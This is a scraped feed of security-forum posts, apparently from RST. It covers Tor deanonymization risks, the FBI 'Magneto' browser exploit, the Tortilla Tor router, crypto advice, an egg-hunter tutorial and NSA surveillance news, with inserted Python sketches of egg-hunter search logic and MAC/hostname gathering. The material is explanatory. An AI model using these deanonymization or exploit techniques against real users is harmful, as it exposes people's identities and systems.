Major Update: Because of Tor's "perfect forward secrecy", the NSA wouldn't be cracking the RSA key when eavesdropping. Instead, they would need to crack the "ephemeral" keys. A lot of older servers use 1024-bit DH ephemeral keys, which are about as easy to break as 1024-bit RSA keys. Newer servers use 256-bit ECDH keys, which are a lot stronger, and likely not crackable by the NSA (estimates say the NSA can crack up to 160-bit ECDH keys). Thus, for older servers, the NSA's ability to passively eavesdrop and crack keys is a big threat, but for newer servers it's likely not a threat. (I'm using Keylength - Cryptographic Key Length Recommendation and round numbers here for key lengths.) (I'm using TorStatus - Tor Network Status and my own pcaps to confirm that a lot of 1024-bit DH is still out there in the Tor nodes.)

The NSA can influence parts of the network

The NSA can flood the servers it doesn't control with traffic, thus encouraging users to move onto its own servers. Thus, it can get more connections onto its servers than chance would suggest.

Multiple apps share the same underlying Tor egress

Let's say that you use SSL for Twitter, but non-SSL for your email app. Both of these go out the same exit node. This allows the NSA to associate the two together: the user named in the email connection gets associated with the otherwise anonymous Twitter connection. This association works well when the NSA is controlling the exit node, and less well if it's simply monitoring the exit node.

Outages out you

As everyone knows, if the NSA is monitoring both you and the server you visit, it might be able to match up traffic patterns to associate the two.
This is tricky for them, so a better way is to control the association by injecting faults. If the NSA is able to send reset (spoofed TCP RST) packets to your end of the connection, it'll cause the egress connection on the other end to drop. Some suspect the NSA is doing this in order to find hidden services.

Exploits (0day or not) can leak your IP address

In the recent incident, the FBI put a Firefox exploit on the servers that was designed to leak a person's IP address. There are lots of other things that can do this, ranging from hidden stuff within video files to PDF files. I doubt that it is possible, in the normal sense (i.e. without putting the Tor proxy and apps on separate machines), to prevent your IP address from being discovered.

DNS leakages can get you

This is partially fixed with the latest build of Firefox in the Tor Browser Bundle, but it's potentially broken in other apps. The basic problem is that Tor is TCP-based, but DNS requests go over UDP. Also, DNS requests go over separate APIs in the operating system that bypass the proxying of Tor. Consequently, when apps open a proxied TCP connection, they'll still leak your IP address when resolving a name via DNS. (h/t @inthecloud247)

Mistakes inevitably happen

Remember: Lulzsec hacker Sabu was discovered because, while he normally logged onto chatrooms using Tor, he forgot once -- and once was enough.

The NSA passes info to the FBI

Normally, the NSA wouldn't go after petty criminals, like kids buying drugs on SilkRoad. That's because doing so would reveal the existence of the program, which the NSA wants to keep secret. But now we've heard stories about how the NSA can give such information to the FBI without revealing the program. Unmasking connections is opportunistic: the NSA is just running a huge dragnet and testing connections when it gets lucky. With the above program, it can just pass the results along to the FBI.
That means even the pettiest of petty criminals might get caught by the NSA's Tor monitoring.

Conclusion

Experts can probably use Tor safely, hiding from the NSA -- assuming the NSA controls only a small number of nodes, and that its 1024-bit key factoring ability is limited. It would require a lot of opsec: putting apps on a different [virtual] machine than the proxy, and making sure egress connections are encrypted. However, the average person using the Tor Browser Bundle is unlikely to have the skills needed to protect themselves. And this might be a good thing: it means dissidents throughout the world can probably hide from their own governments, while our NSA cleans the network of all the drug dealers and child pornographers.

Update: Some comments might appear on the Tor mailing list here.

Source: Errata Security: Anonymity Smackdown: NSA vs. Tor
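The back-of-the-envelope odds in the article above (an adversary running some fraction of nodes, three hops, a new path every 15 minutes) can be sketched as a quick calculation. The 1% figure is the article's assumption, the hops are treated as independent, and this deliberately ignores the guard-node mitigation the article mentions:

```python
# Rough sketch of the article's math: if an adversary runs a fraction
# `p` of all Tor nodes, a random 3-hop circuit is fully compromised
# with probability p**3 (assuming independent node selection and
# ignoring guard nodes, which reduce this in practice).
def full_circuit_compromise(p: float, circuits: int) -> float:
    per_circuit = p ** 3
    # probability that at least one of `circuits` independent
    # circuits is fully compromised
    return 1 - (1 - per_circuit) ** circuits

print(full_circuit_compromise(0.01, 1))        # one random circuit
print(full_circuit_compromise(0.01, 96 * 30))  # ~a month of 15-minute paths
```

With 1% of nodes, a single circuit is compromised about one time in a million, but a month of 15-minute circuits pushes the cumulative chance to roughly 0.3%, which is the "over the long run" effect the article describes.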
  14. Android 5.0 Key Lime Pie: 12 features we want to see

Updated: Visual voicemail, revamped messaging and enhanced multitasking are just some of the things we'd like to see.

Android 5.0 will be the next edition of the world's most popular smartphone operating system, and could be set for release in late October. Developed under the codename Android Key Lime Pie (KLP), this version of the software is a major refresh and is expected to introduce a raft of features as well as a boost in performance. According to reports, Google is planning to release the latest version of its mobile operating system in October to coincide with Android's fifth birthday, and the release of the Motorola X device. The new OS is also expected to run on a much wider range of devices than Android 4.2 Jelly Bean, including those with 512 MB of RAM.

IT Pro has compiled a list of 12 improvements we'd like to see in Android 5.0. Do you agree? Are there any features you'd like to see Google introduce? Let us know below.

12. Improved security

Despite its popularity, security is still a core problem for the Android platform. This is primarily down to the Google Play store being infiltrated with apps containing malware, but that isn't the only cause. Most recently, Bluebox Security discovered a "Master Key" flaw, which leaves 99 per cent of devices (900 million) vulnerable to being hacked. A patch is being rolled out as we speak, but it's another major sign that Google needs to do more to ensure its devices are safer.

11. Performance profiles

We've already got the ability to toggle between silent and flight mode, but enhanced profiles which can be customised to alter the performance levels of the device would be invaluable, as they can help to save battery life or boost CPU speeds for complex tasks. OEMs such as Motorola and Samsung already offer users things such as Blocking Mode and Smart Actions, respectively.
We would like to see Google step up and offer a variety of modes built into Android, especially for its Nexus range. These would allow the user to save battery overnight, turn up performance when using the device for gaming/multimedia, and choose settings in between.

10. Visual voicemail

There are apps which provide this service in the US, but there is little love for users in the UK. Google and its OEM partners should use their close ties with carriers to kickstart this service in the UK. A native app would be useful to people who are frequently in meetings, as they could quickly check whether a voicemail they have received is urgent.

9. Beef up Google Now

Google Now was introduced in 2012 as part of Android 4.1 Jelly Bean, but its usefulness is largely restricted to the US. In the UK, the software primarily functions as a reminder tool for events you may have – and is always on hand to show you how long it will take to get home from any given location. We expect Google to make some more partnership announcements, which will extend the usefulness of Now outside of the grand ol' USA.

8. Ability to turn off OEM skins on any device

When Android 5.0 KLP launches, it is expected to arrive on a brand-new handset carrying Google's 'Nexus' branding. Likely to be dubbed the Nexus 5, this smartphone will ship with the vanilla version of Android, and will be developer friendly. OEMs such as HTC, LG and Samsung will place their custom skins over the top of Android KLP when it is released on their handsets to differentiate them. It would be good if Google built a master switch into Android, giving users the choice to switch off these OEM skins without having to root their devices. The chances of this happening, though, are virtually zero. OEMs such as HTC and Samsung add features which will only work with their respective skins active, and they are not going to want to let users disable them.
Google is unlikely to pull rank on its partners either – as it feels that one of the strengths of the operating system is its customisation.

7. Child/Business-friendly modes as standard

Kids Corner was a useful feature that Microsoft introduced in the Windows Phone 8 OS. Microsoft effectively built a sandbox into the mobile OS, allowing users to lock down sensitive information like emails, while allowing kids to access features such as games. It would be good to see Google incorporate a similar feature into Android.

BlackBerry built its Balance feature into the Z10 smartphone. This allows IT admins to separate business and personal data – and means that employees cannot copy sensitive information from one side to the other. It also means that when a user leaves an organisation, the business side of the handset can be wiped without affecting the personal information. Samsung is already trying to make inroads into the enterprise by launching a secured edition of Android known as Knox. This aims to replicate the functionality of BlackBerry Balance, so it is possible to do so.

6. Find my Droid

You'd expect a simple feature like this to be included in a comprehensive system such as Android, but it has yet to materialise. With the firm's extensive mapping service, and GPS included in handsets, it shouldn't be too much of a stretch for Google to build this functionality into the heart of the OS.

5. Revamped messaging

This is the feature which has been talked about extensively, due to leaked information. It will be interesting to see how Google goes about tackling messaging in a world where apps such as WhatsApp dominate. Google's "Babel" service is expected to allow users to access messages across Android smartphones and tablets. The web giant is also tipped to launch clients for other popular platforms such as iOS.
Folks over at the Google Operating System blog found a JavaScript file on Gmail's servers appearing to confirm the existence of Babel and some of the key features it will include:

- Redesigned conversation-based UI
- Access conversation lists from smartphones, tablets and PCs
- Advanced group conversations
- Ability to send pictures
- Improved notifications across devices

4. Offline maps and better control over location settings

Nokia has been leading the way in this field by allowing users to download comprehensive guidance and then use it for free offline. Google already offers comprehensive guidance through its Maps and Navigation apps, but it does crunch through battery when in use. Privacy hasn't been a strong point for Google, with the firm receiving numerous fines for collecting data from individuals. One way Google could try to rebuild its privacy image would be to let users choose whether they want to share their location. iOS already allows users to turn off location services for individual apps if they choose to. This feature would be welcome on Android, so you don't have all your apps sending off data. Of course, it would help to save battery life too.

3. Improved battery life and performance

There are whispers that Google will upgrade the framework of Android to the Linux 3.8 kernel. What does this mean for regular users? In short, such an upgrade should make Android less memory hungry. Devices should become more efficient as they gobble up less RAM for tasks, and in turn this should result in improved battery life. Google introduced its Project Butter initiative with Jelly Bean to help solve the latency issues Android was experiencing. This has gone a long way toward reducing the perceived "lag" associated with Android. Improvements to Butter are expected.

2. Enhanced multitasking

Android has been at the forefront of mobile computing when it comes to features such as multitasking. Users are able to run multiple apps at the same time and flick between them.
With the forthcoming Galaxy S4, Samsung will allow users to snap two apps onto the screen of the 5in device, so they can be used at the same time. It'll be possible to watch videos while replying to emails, or surf the internet and make notes. It would be great to see Google take the initiative and make a multitasking feature like this standard across all high-end handsets.

1. Complete Android backup

Although it is possible to sync key features such as contacts and apps with a Gmail account, a full-blown native backup is lacking from Android handsets. When you switch between Android handsets, photos, music and text messages are lost in the transition, as are any customisations you have made. Apple already has a cloud backup service, which works well when you upgrade your iPhone – and we hope Google will introduce something similar with Android KLP.

This article was originally published on 24 April, but has since been updated to include further release date information.

Source: Android 5.0 Key Lime Pie: 12 features we want to see | IT PR
  15. Tortilla v1.0.1 Beta

by Jason Geffner (jason@crowdstrike.com) and Cameron Gutman (cameron@crowdstrike.com)

Tortilla is a free and open-source solution for Windows that transparently routes all TCP and DNS traffic through Tor. This product is produced independently from the Tor® anonymity software and carries no guarantee from The Tor Project about quality, suitability or anything else.

LICENSE

Please see the LICENSE.txt file for complete licensing details.

BUILD INSTRUCTIONS

This distribution comes with a pre-built version of Tortilla.exe. If you would like to use the pre-built Tortilla.exe, you may skip to USAGE INSTRUCTIONS. Otherwise, follow the steps below to build Tortilla.exe with Visual Studio. Note: Building Tortilla will require WDK 8.0 or higher.

1. Open the Tortilla.sln solution in Visual Studio
2. If you would like to use your own driver signing certificate instead of the test-signed certificate distributed with this distribution, update the Driver Signing Configuration Property in the TortillaAdapter project and the TortillaAdapter Package project
3. In the Visual Studio menu bar, select BUILD -> Batch Build...
4. In the Batch Build window, check the following items:
   InstallTortillaDriver Debug Win32
   InstallTortillaDriver Debug x64
   InstallTortillaDriver Release Win32
   InstallTortillaDriver Release x64
   Tortilla Debug Win32
   Tortilla Release Win32
   TortillaAdapter Vista Debug Win32
   TortillaAdapter Vista Debug x64
   TortillaAdapter Vista Release Win32
   TortillaAdapter Vista Release x64
   TortillaAdapter Package Vista Debug Win32
   TortillaAdapter Package Vista Debug x64
   TortillaAdapter Package Vista Release Win32
   TortillaAdapter Package Vista Release x64
5. In the Batch Build window, press the Build button

The driver package files, InstallTortillaDriver.exe, and the default Tortilla.ini file all get embedded in Tortilla.exe (created in the \Debug and \Release directories). You need not distribute anything other than Tortilla.exe.
USAGE INSTRUCTIONS

The usage instructions below apply to your host operating system. All of Tortilla's components exist on the host operating system. No Tortilla files need to be copied into your virtual machine.

1. If your host system is Windows Vista or later and the Tortilla driver package is signed with a test-signed certificate, configure your system to support test-signed drivers - The TESTSIGNING Boot Configuration Option (Windows Drivers)
2. Download the Tor Expert Bundle from https://www.torproject.org/download (expand the Microsoft Windows drop-down and download the Expert Bundle)
3. Install the Tor Expert Bundle and run Tor
4. Run Tortilla.exe; this will install the Tortilla Adapter as a virtual network adapter and will run the Tortilla client
5. Configure a virtual machine to use the Tortilla Adapter as its network adapter. For VMware, open Virtual Network Editor, edit or add a new VMnet network, and bridge that VMnet to the Tortilla Adapter. In your virtual machine's Virtual Machine Settings, set the Network Adapter's Network connection to Custom and select the VMnet that was bridged to the Tortilla Adapter.
6. In your virtual machine's guest operating system, ensure that the network adapter's TCP/IPv4 protocol is configured to obtain an IP address automatically via DHCP (Tortilla acts as a simple DHCP server)
7. Use your VM to access the Internet; all TCP and DNS traffic will be automatically and transparently routed through Tor
8. If you like, you may edit the Tortilla.ini file created by Tortilla.exe; restarting Tortilla.exe will cause it to use the configuration in Tortilla.ini

UNINSTALLATION INSTRUCTIONS

1. Delete Tortilla.exe
2. Delete Tortilla.ini
3. Open Device Manager in Windows, expand the list of Network adapters, and delete the Tortilla Adapter

RELEASE NOTES

1.0.1 Beta -- Driver initialization fix + client fix for DHCP broadcasts
1.0 Beta -- Initial release

Download: https://github.com/CrowdStrike/Tortilla/tree/master/Tortilla

Source: https://github.com/CrowdStrike/Tortilla
  16. Nytro

    HttpS curiosity

    Download OpenSSL (if you know C) and look through the source: http://www.openssl.org/source/openssl-1.0.1e.tar.gz

You'll find pretty much all the algorithms you're looking for in there. There are also plenty of libraries you can use to actually test the algorithms, for example mcrypt for PHP. For explanations of how they work, you'll find plenty of material on Google/Wikipedia. Honestly, I'd recommend a cryptography book, though I don't know which one in particular. Look for a more in-depth one if you're really interested in the subject.

Look into the security problems that come up with various algorithms:

- https://rstforums.com/forum/73411-step-into-breach-https-encrypted-web-cracked-30-seconds.rst
- https://rstforums.com/forum/72746-how-digital-certificates-used-misused.rst
- https://rstforums.com/forum/73266-step-into-breach-new-attack-developed-read-encrypted-web-data.rst
- https://rstforums.com/forum/70778-how-nsa-access-built-into-windows.rst
- https://rstforums.com/forum/69666-advanced-cryptography.rst
- https://rstforums.com/forum/68262-crypto-2012-breaking-repairing-gcm-security-proofs.rst
- https://rstforums.com/forum/67417-new-rc4-attack.rst
- https://rstforums.com/forum/66787-stanford-javascript-crypto-library.rst
- https://rstforums.com/forum/66739-failures-secret-key-cryptography.rst
- https://rstforums.com/forum/66643-another-crypto-attack-ssl-tls-encryption.rst
- https://rstforums.com/forum/66368-cryptographic-primitives-c.rst
- https://rstforums.com/forum/66073-botan-c-crypto-algorithms-library-1-10-5-a.rst
- https://rstforums.com/forum/64975-attack-week-tls-timing-oracles.rst
- https://rstforums.com/forum/64725-unlucky-you-uk-crypto-duo-crack-https-lucky-13-attack.rst
- https://rstforums.com/forum/64163-crypto-cops-law-key-disclosure-forced-decryption.rst
- https://rstforums.com/forum/63693-security-evaluation-russian-gost-cipher.rst
- https://rstforums.com/forum/62592-crypto-pentesters.rst
- https://rstforums.com/forum/62126-pgp-truecrypt-encrypted-files-cracked-300-tool.rst

There are plenty of resources available right here too, as long as you have the time and the initiative.
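In the same spirit of experimenting with algorithms through a library (the post above suggests mcrypt for PHP), Python's standard hashlib module exposes the common digest algorithms with no extra dependencies:

```python
import hashlib

# Compute a few common digests of the same input using Python's
# standard library (a quick way to poke at hash algorithms, much
# like mcrypt in PHP).
data = b"hello"
for name in ("md5", "sha1", "sha256", "sha512"):
    print(name, hashlib.new(name, data).hexdigest())
```

Comparing outputs across algorithms makes the differing digest lengths (128, 160, 256 and 512 bits) immediately visible.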
  17. Nytro

    HttpS curiosity

    1. RC4 doesn't compare to AES. AVOID RC4! I don't know which one is "best", but if you have a 2048-bit RSA key for the (asymmetric) key exchange and 256-bit AES for the symmetric encryption, that should be enough to keep you from worrying. I do suggest using elliptic curves (ECDH) for the key exchange, though, and GCM as the mode of operation for AES on the symmetric side.

2. Because the simpler an algorithm is, the easier it is to "break". I can't tell you exactly why, but I take into account the possibility that, if data is intercepted, governments may be able to "break" the encrypted traffic. In theory, they use this for compatibility with older browsers and for faster page loading.

3. If you mean a symmetric encryption algorithm, it would be pretty useless and very slow; there would practically be no point. In the worst case, 512 bits for a key are enough. Think about how long it would take someone to try 2^512 (2 to the power of 512) combinations for a key...

4. I know there was a NIST competition for an algorithm to replace SHA. The result, the best algorithm chosen, is Keccak, in other words yes, SHA3. If you're paranoid, use the 512-bit version, but I don't know whether it's really necessary, since it's a function for computing a hash, i.e. for ensuring data integrity, not for protecting the data itself.
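The 2^512 brute-force argument above can be made concrete with a rough estimate; the guess rate of 10^12 keys per second is an arbitrary, deliberately generous assumption for illustration:

```python
# Rough brute-force cost for a 512-bit key. The 10**12 guesses per
# second rate is an assumed (generous) figure, not a real benchmark.
keyspace = 2 ** 512
guesses_per_second = 10 ** 12
seconds = keyspace // guesses_per_second
years = seconds // (365 * 24 * 3600)
print(years)  # an astronomically large number of years
```

Even at that rate, exhausting the keyspace takes on the order of 10^134 years, which is why key sizes beyond 256-512 bits buy nothing against brute force.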
  18. At the end, I think an exam covering everything would be fine.
  19. Win32 Egg Hunter

http://www.youtube.com/watch?v=c630azKzxeM&feature=player_embedded

Description: Detailed tutorial on Win32 egg hunter implementation.

Ajin Abraham @ajinabraham
Kerala Cyber Force
www.keralacyberforce.in

Source: Win32 Egg Hunter
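The core idea of the egg hunter covered in the tutorial above is a tiny first-stage that scans memory for a doubled tag ("egg") and transfers control to the payload placed right after it. Real egg hunters are a handful of x86 instructions; this Python sketch only illustrates the search logic, using the conventional "w00tw00t" tag:

```python
# Illustrative egg-hunter search logic (not the x86 implementation):
# scan a memory image for the doubled egg tag and return the offset
# of the payload that immediately follows it.
EGG = b"w00t" * 2  # the tag is doubled so the hunter doesn't find itself

def find_egg(memory: bytes, egg: bytes = EGG) -> int:
    """Return the offset where the payload starts, or -1 if absent."""
    idx = memory.find(egg)
    return -1 if idx == -1 else idx + len(egg)

image = b"\x90" * 64 + EGG + b"PAYLOAD"
print(find_egg(image))  # offset of b"PAYLOAD" inside `image`
```

The doubling of the tag is the key trick: the hunter's own code contains the 4-byte tag only once, so scanning for the 8-byte doubled form never matches the hunter itself.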
  20. Feds Are Suspects in New Malware That Attacks Tor Anonymity

By Kevin Poulsen 08.05.13 3:57 AM

Security researchers tonight are poring over a piece of malicious software that takes advantage of a Firefox security vulnerability to identify some users of the privacy-protecting Tor anonymity network.

The malware showed up Sunday morning on multiple websites hosted by the anonymous hosting company Freedom Hosting. That would normally be considered a blatantly criminal "drive-by" hack attack, but nobody's calling in the FBI this time. The FBI is the prime suspect.

"It just sends identifying information to some IP in Reston, Virginia," says reverse-engineer Vlad Tsyrklevich. "It's pretty clear that it's FBI or it's some other law enforcement agency that's U.S.-based."

If Tsyrklevich and other researchers are right, the code is likely the first sample captured in the wild of the FBI's "computer and internet protocol address verifier," or CIPAV, the law enforcement spyware first reported by WIRED in 2007.

Court documents and FBI files released under the FOIA have described the CIPAV as software the FBI can deliver through a browser exploit to gather information from the target's machine and send it to an FBI server in Virginia. The FBI has been using the CIPAV since 2002 against hackers, online sexual predators, extortionists, and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.

The code has been used sparingly in the past, which kept it from leaking out and being analyzed or added to anti-virus databases.

The broad Freedom Hosting deployment of the malware coincides with the arrest of Eric Eoin Marques in Ireland on Thursday on a U.S. extradition request.
The Irish Independent reports that Marques is wanted for distributing child pornography in a federal case filed in Maryland, and quotes an FBI special agent describing Marques as "the largest facilitator of child porn on the planet."

Freedom Hosting has long been notorious for allowing child porn to live on its servers. In 2011, the hacktivist collective Anonymous singled out Freedom Hosting for denial-of-service attacks after allegedly finding the firm hosted 95 percent of the child porn hidden services on the Tor network.

Freedom Hosting is a provider of turnkey "Tor hidden service" sites — special sites, with addresses ending in .onion — that hide their geographic location behind layers of routing, and can be reached only over the Tor anonymity network. Tor hidden services are ideal for websites that need to evade surveillance or protect users' privacy to an extraordinary degree – which can include human rights groups and journalists. But it also naturally appeals to serious criminal elements.

Shortly after Marques' arrest last week, all of the hidden service sites hosted by Freedom Hosting began displaying a "Down for Maintenance" message. That included websites that had nothing to do with child pornography, such as the secure email provider TorMail.

Some visitors looking at the source code of the maintenance page realized that it included a hidden iframe tag that loaded a mysterious clump of JavaScript code from a Verizon Business internet address located in Virginia. By midday Sunday, the code was being circulated and dissected all over the net.

Mozilla confirmed the code exploits a critical memory management vulnerability in Firefox that was publicly reported on June 25, and is fixed in the latest version of the browser.
Though many older revisions of Firefox are vulnerable to that bug, the malware only targets Firefox 17 ESR, the version of Firefox that forms the basis of the Tor Browser Bundle – the easiest, most user-friendly package for using the Tor anonymity network.

"The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based," the non-profit Tor Project wrote in a blog post Sunday. "We're investigating these bugs and will fix them if we can."

The inevitable conclusion is that the malware is designed specifically to attack the Tor browser. The strongest clue that the culprit is the FBI, beyond the circumstantial timing of Marques' arrest, is that the malware does nothing but identify the target.

The payload for the Tor Browser Bundle malware is hidden in a variable called "magneto".

The heart of the malicious JavaScript is a tiny Windows executable hidden in a variable named "Magneto." A traditional virus would use that executable to download and install a full-featured backdoor, so the hacker could come in later and steal passwords, enlist the computer in a DDoS botnet, and generally do all the other nasty things that happen to a hacked Windows box. But the Magneto code doesn't download anything. It looks up the victim's MAC address — a unique hardware identifier for the computer's network or Wi-Fi card — and the victim's Windows hostname. Then it sends them to the Virginia server, outside of Tor, exposing the user's real IP address, coded as a standard HTTP web request.

"The attackers spent a reasonable amount of time writing a reliable exploit, and a fairly customized payload, and it doesn't allow them to download a backdoor or conduct any secondary activity," says Tsyrklevich, who reverse-engineered the Magneto code.

The malware also sends, at the same time, a serial number that likely ties the target to his or her visit to the hacked Freedom Hosting-hosted website.
In short, Magneto reads like the x86 machine code embodiment of a carefully crafted court order authorizing an agency to blindly trespass into the personal computers of a large number of people, but for the limited purpose of identifying them.

But plenty of questions remain. For one, now that there's a sample of the code, will anti-virus companies start detecting it?

Update 8.5.13 12:50: According to Domaintools, the malware's command-and-control IP address in Virginia is allocated to Science Applications International Corporation. Based in McLean, Virginia, SAIC is a major technology contractor for defense and intelligence agencies, including the FBI. I have a call in to the firm.

13:50: Tor Browser Bundle users who installed or manually updated after June 26 are safe from the exploit, according to the Tor Project's new security advisory on the hack.

14:30: SAIC has no comment.

15:10: There are incorrect press reports circulating that the command-and-control IP address belongs to the NSA. Those reports are based on a misreading of domain name resolution records. The NSA's public website, NSA.gov, is served by the same upstream Verizon network as the Tor malware command-and-control server, but that network handles tons of government agencies and contractors in the Washington DC area.

8.6.13 17:10: SAIC's link to the IP addresses may be an error in Domaintools' records. The official IP allocation records maintained by the American Registry for Internet Numbers show the two Magneto-related addresses are not part of SAIC's publicly-listed allocation. They're part of a ghost block of eight IP addresses that have no organization listed. Those addresses trace no further than the Verizon Business data center in Ashburn, Virginia, 20 miles northwest of the Capital Beltway. (Hat tip: Michael Tigas)

Source: Feds Are Suspects in New Malware That Attacks Tor Anonymity | Threat Level | Wired.com
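Conceptually, the two identifiers the article says Magneto collects (the MAC address and the Windows hostname) can be gathered in a few lines. This is only an illustration of the idea in Python; the actual payload is a tiny Windows executable, not Python:

```python
import socket
import uuid

# Illustration of the identifying data described in the article:
# a network card's MAC address plus the machine's hostname. Note
# that uuid.getnode() may fall back to a random 48-bit value when
# no hardware address can be read.
def gather_host_identifiers():
    mac = "%012x" % uuid.getnode()   # 48-bit MAC as 12 hex digits
    hostname = socket.gethostname()
    return mac, hostname

print(gather_host_identifiers())
```

The point the article makes is that this pair, sent outside Tor as a plain HTTP request, is enough to tie a real machine to an otherwise anonymous session.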
  21. Nytro

    .

    Yeah, it's great; too bad it uses MHook, it would have been more 1337 without it...
  22. THE COMPUTER ESPIONAGE CASE: An NSA server may also be located in Romania. A MAP of the countries where servers may exist

by Valentin Vidu - Mediafax

The site Cryptome.org has published a list of countries and a world map marked with red dots which, it says, "could be symbolic locations or could indicate (the existence of) NSA X-Keyscore servers at United States embassies", including in Romania. According to the site, which cites no source, although some of the server locations are known as "NSA-Echelon spy stations within the Five Eyes - the United States, the United Kingdom, Canada, Australia and New Zealand", many of the server locations are marked in or near the capitals of these countries.

The site considers the dot in Moscow a "surprise" and notes that another dot appears in south-central China, far from Beijing, judging that it may be a "clandestine server". The site also remarks that the NSA station in Hawaii, where Edward Snowden worked, does not appear on the map.

About 85 dots are marked on the world map, said to represent "approximately 150 sites", with 25 of the dots located on the coasts of Antarctica. Red dots also appear in 51 countries. The densest concentration is in Europe, the Middle East, South Asia and Central America, the site observes, underlining that none appear in areas such as Norway, Sweden, Iceland, Canada, most of South America, the Pacific and the Atlantic islands.

Cryptome.org considers that "it would be logical for the American National Security Agency (NSA) to use American embassies as outposts for collecting local communications (data) with the help of X-Keyscore", noting that embassies have been used for "the whole spectrum of espionage in all its forms and disguises - military, political, economic, social" and concluding that "adding the cyber aspect was inevitable". The site argues that embassies operate multiple communication networks, from the lowest security levels up to the highest.

The same source adds that further disclosures of documents from Edward Snowden could describe how this is accomplished through personnel, networks and data server architecture, not just through the PRISM and X-Keyscore programs.

Cryptome.org is a digital hosting library created in 1996 by the independent American researchers and architects John Young and Deborah Natsios. The library serves as a repository for information about freedom of expression, cryptography, espionage and surveillance. On its site, Cryptome states its mission as being "to receive for publication documents that are banned by governments worldwide, in particular material on freedom of expression, privacy, cryptology, dual-use technologies, national security, intelligence and secret governance - declassified, secret and classified documents - but not limited to these".

Source: CAZUL DE SPIONAJ INFORMATIC: Un server aparținând NSA s-ar afla și în România. HARTA țărilor în care ar exista servere - Mediafax
  23. Yes, it stays at 17, but it includes the necessary patches: https://blog.torproject.org/blog/tor-security-advisory-old-tor-browser-bundles-vulnerable
  24. Yes. Those of you who still don't have Firefox 22 would do well to update. And it's a good counter-example to the claim that "Firefox is more secure than IE". Fine, use Chrome.